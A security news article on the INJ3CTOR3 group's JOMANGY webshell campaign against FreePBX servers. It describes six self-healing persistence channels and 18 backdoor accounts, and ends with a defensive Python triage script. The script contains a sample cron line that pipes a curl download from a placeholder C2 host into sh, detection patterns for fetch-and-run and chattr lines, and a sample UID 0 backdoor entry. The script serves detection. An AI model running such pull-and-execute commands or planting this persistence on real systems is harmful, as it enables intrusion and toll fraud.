INJ3CTOR3 Group Deploys Self-Healing JOMANGY Webshell in Toll Fraud Campaign Against FreePBX Systems
The INJ3CTOR3 hacker group is targeting over 3,000 FreePBX VoIP systems with a novel PHP webshell called JOMANGY that uses six self-healing persistence layers to maintain access for toll fraud.

The INJ3CTOR3 hacker group has launched an active campaign against internet-exposed FreePBX VoIP systems, deploying a newly discovered PHP webshell called JOMANGY that employs six separate persistence layers to stay embedded on compromised servers. The operation targets over 3,000 IP addresses for toll fraud, routing calls through compromised systems at the victims' expense. FreePBX, an open-source interface for managing phone systems built on Asterisk software, handles real carrier accounts with SIP trunks that can originate actual phone calls, making it an attractive target for attackers seeking to route calls through premium-rate numbers they control.
Analysts at Cyble (CRIL) identified the campaign and tied it with high confidence to INJ3CTOR3, an actor that has targeted VoIP infrastructure for financial gain since at least 2019. Prior campaign generations were documented by Check Point Research in 2020, Palo Alto Unit 42 in 2022, and Fortinet in January 2026. The Shadowserver Foundation tracked over 900 FreePBX hosts compromised during the January 2026 campaign wave, and by May 2026, more than 700 of those systems remained infected despite five months of public disclosure, highlighting how difficult these infections are to clear.
Two vulnerabilities are the most likely entry points for the current campaign. CVE-2025-64328 is a post-authentication command injection flaw in the FreePBX filestore module, while CVE-2025-57819 is a pre-authentication SQL injection bug in the FreePBX Endpoint module. Both are patched in current FreePBX releases, though patching an already-infected host leaves the cron infrastructure running and the malware fully capable of re-establishing itself.
What sets this campaign apart is the engineering of its persistence. The six channels are not independent backups sitting in parallel; each one can reconstruct every other channel, making the infection genuinely self-healing. Clearing five of the six still hands the attacker a recovery window measured in minutes. The first channel polls the attacker's command-and-control server every one to three minutes via scheduled cron jobs, continuously re-downloading and re-executing the dropper. The second fires a re-infection payload on every root login and system reboot by injecting code into shell profile files. The third stores eight immutable crontab copies in hidden directories, protected by a file attribute that silently blocks deletion even by root, backed by two separate restore loops.
The fourth channel is a process watchdog that immediately re-downloads the dropper if the beacon processes disappear. The fifth plants webshell copies across more than twelve paths in the FreePBX web tree, many locked immutable, where a single authenticated request to any survivor rebuilds the full infection stack. The sixth is a PHP executor in the FreePBX high-availability module providing privileged command execution independently of all other channels.
The infection also quietly drops 18 backdoor accounts across three tiers. Nine carry full root-equivalent privileges, eight operate at the service account level, and one is injected into the FreePBX web panel database via MySQL. Account names like asterisk, freepbxuser, and spamfilter were deliberately chosen to blend into the legitimate account list administrators would expect to find. JOMANGY had not been publicly documented before this analysis; it uses double-layer obfuscation combining base64 encoding and ROT13 to defeat automated scanners. At the time of research, the primary dropper had only four detections across 76 antivirus engines, while k.php and wr.php had zero.
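A defender-side triage script for the indicator classes described in the persistence and backdoor-account paragraphs above (extra UID 0 accounts in /etc/passwd, pull-and-execute lines in crontabs or shell profiles, and immutable files reported by lsattr), written as an added example rather than code from Cyble's report; the passwd, crontab and lsattr samples are constructed and the C2 host is a placeholder.

```python
import re

# Added example: the functions take text so they work on live files or command
# output as well as on captured samples; nothing here is a real IoC.

# Lines that fetch-and-run remote code, decode base64, or set the immutable bit.
SUSPICIOUS = re.compile(
    r"(curl|wget)\b.*\|\s*(sh|bash)\b|base64\s+(-d|--decode)\b|chattr\s+\+i", re.I)
EXPECTED_UID0 = {"root"}  # assumption: only root legitimately has UID 0 here

def extra_uid0_accounts(passwd_text):
    """Account names with UID 0 other than root: root-equivalent backdoors."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] not in EXPECTED_UID0:
            found.append(fields[0])
    return found

def suspicious_lines(text):
    """Crontab or shell-profile lines matching the pull-and-execute patterns."""
    return [ln.strip() for ln in text.splitlines() if SUSPICIOUS.search(ln)]

def immutable_files(lsattr_output):
    """Parse `lsattr -R` output and return paths carrying the immutable (i) flag."""
    paths = []
    for line in lsattr_output.splitlines():
        m = re.match(r"^([-a-zA-Z]+)\s+(\S.*)$", line)
        if m and "i" in m.group(1):
            paths.append(m.group(2))
    return paths

# Constructed samples: made-up account, cron job, and lsattr lines.
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "asterisk:x:1001:1001::/var/lib/asterisk:/sbin/nologin\n"
                 "spamfilter:x:0:0::/root:/bin/bash\n")
SAMPLE_CRON = ("*/2 * * * * root curl -s http://C2-PLACEHOLDER/d.sh | sh\n"
               "0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n")
SAMPLE_LSATTR = ("----i---------e------- /etc/cron.d/.sys\n"
                 "--------------e------- /etc/cron.d/raid-check\n")

def triage():
    """Run the three checks over the samples and return the findings."""
    return {"uid0": extra_uid0_accounts(SAMPLE_PASSWD),
            "cron": suspicious_lines(SAMPLE_CRON),
            "immutable": immutable_files(SAMPLE_LSATTR)}

if __name__ == "__main__":
    for kind, hits in triage().items():
        print(kind, hits)
```

On a live host, feed the functions the contents of /etc/passwd, /etc/cron* and the root shell profiles, and the output of `lsattr -R` over /etc and the FreePBX web tree; a hit in any of the three is a reason to treat the box as compromised rather than cleanable.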
Anyone dealing with a confirmed infection is advised to rebuild from a clean baseline, as leaving even one channel active gives the attacker enough leverage to restore the entire infection stack within minutes. The campaign underscores the growing sophistication of financially motivated threat actors targeting VoIP infrastructure, where the combination of self-healing malware and persistent backdoor accounts makes remediation far more complex than simply applying patches.